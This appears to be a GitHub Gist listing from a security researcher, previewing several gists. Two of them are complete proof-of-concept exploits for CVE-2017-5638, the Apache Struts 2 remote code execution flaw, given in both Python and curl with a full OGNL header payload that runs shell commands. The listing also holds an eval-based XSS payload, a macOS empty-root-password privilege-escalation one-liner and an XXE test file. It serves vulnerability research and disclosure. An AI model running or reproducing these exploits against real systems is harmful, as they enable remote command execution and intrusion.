David Hoyt xsscx
xsscx
/ CSSearchQuery_UITests.swift
Created
August 26, 2024 13:25
Test to reproduce crash in the Preferences app when entering a specific string in the search field.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import XCTest | |
| class CSSearchQuery_UITests: XCTestCase { | |
| // MARK: - Test Methods | |
| /// Test to reproduce crash in the Preferences app when entering a specific string in the search field. | |
| func testPreferencesSearchCrash() throws { | |
| // Initialize the Preferences app | |
| let app = XCUIApplication(bundleIdentifier: "com.apple.Preferences") |
xsscx
/ apple.security-research-device-example-print-magicnumber-script.sh
Created
March 6, 2022 12:59
SRD Print Default Magic Numbers from ./example-cryptex/
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/sh | |
| hexdump -n 4 com.example.cryptex.dstroot/usr/bin/hello | |
| hexdump -n 4 com.example.cryptex.dstroot/usr/bin/toybox | |
| hexdump -n 4 com.example.cryptex.dstroot/usr/bin/simple-shell | |
| hexdump -n 4 com.example.cryptex.dstroot/usr/bin/simple-server | |
| hexdump -n 4 com.example.cryptex.dstroot/usr/bin/nvram | |
| hexdump -n 4 com.example.cryptex.dstroot/usr/bin/debugserver | |
| hexdump -n 4 com.example.cryptex.dstroot/usr/bin/cryptex-run | |
| hexdump -n 4 com.example.cryptex.dstroot/usr/bin/frida-server | |
| hexdump -n 4 com.example.cryptex.dstroot/usr/bin/libclang_rt.ubsan_ios_dynamic.dylib |
xsscx
/ apple.security-research-device-example-build-script.sh
Created
February 18, 2022 12:58
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/sh | |
| echo "unmounting com.example.cryptex" | |
| cryptexctl uninstall com.example.cryptex | |
| echo "Start the Build" | |
| cp src/hello/Makefile.dist src/hello/Makefile | |
| make clean | |
| make all | |
| echo "Start of entitlement checks..... for example-cryptex with debugserver and latest entitlements from PR48 + PR49....." | |
| rm /private/tmp/*.xml | |
| echo "Check the entitlements in the src/" |
xsscx
/ gist:a1db9a493a5c9bb6fe849176c3443f23
Created
October 26, 2021 13:36
console location.hash js manual injection check for xss window.location.hash
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| console.log(location.hash); | |
| var tabValue = document.URL; | |
| window.location = tabValue.substring(0, tabValue.lastIndexOf("#")); | |
| console.log(location.hash); | |
| window.location.hash = `#<noscript><script>console.log(document.location)&k7="><svg/t='&k8='onload='/&k9=/+eval(t)'` | |
| location.reload(); | |
| console.log(location.hash); |
xsscx
/ PoC for #Iamroot
Created
December 2, 2017 03:14
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /usr/bin/osascript -e 'do shell script "whoami" user name "root" password "" with administrator privileges' |
xsscx
/ XXE Smoke Test - Simple Windows PoC
Created
September 4, 2017 12:26
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!DOCTYPE roottag [ | |
| <!ENTITY windowsfile SYSTEM "."> | |
| ]> | |
| <roottag> | |
| <sometag>&windowsfile;</sometag> | |
| </roottag> |
xsscx
/ CVE-2017-5638.py
Last active
March 10, 2017 16:51
Check for CVE-2017-5638 by XSS.Cx in python with debug on
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # -*- coding: utf-8 -*- | |
| import urllib2 | |
| import urllib3 | |
| import requests | |
| import httplib | |
| import logging | |
| from requests.packages.urllib3.exceptions import InsecureRequestWarning |
xsscx
/ CVE-2017-5638.txt
Created
March 10, 2017 02:09
PoC for CVE-2017-5638 Apache Struts 2 Remote Code Execution in python
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| requests.get("https://target.action", headers={"Connection": "close", "Accept": "*/*", "User-Agent": "Mozilla/5.0 ", "Content-Type": "%{(#_='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"}) |
xsscx
/ CVE-2017-5638.txt
Last active
September 21, 2023 22:10
PoC for CVE-2017-5638 Apache Struts 2 Remote Code Execution in CURL
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| curl -i -s -k -X $'GET' \ | |
| -H $'User-Agent: Mozilla/5.0' -H $'Content-Type: %{(#_=\'multipart/form-data\').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[\'com.opensymphony.xwork2.ActionContext.container\']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=\'ls -lat /\').(#iswin=(@java.lang.System@getProperty(\'os.name\').toLowerCase().contains(\'win\'))).(#cmds=(#iswin?{\'cmd.exe\',\'/c\',#cmd}:{\'/bin/bash\',\'-c\',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}' \ | |
| $'https://target' |
xsscx
/ gist:4c53cc2a0123717f571aaa8952e876a2
Created
March 9, 2017 13:30
IE 10 Compat List - Domain List for IE10 Compat Sites
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| https://iecvlist.microsoft.com/IE10/1152921505002013023/iecompatviewlist.xml |
NewerOlder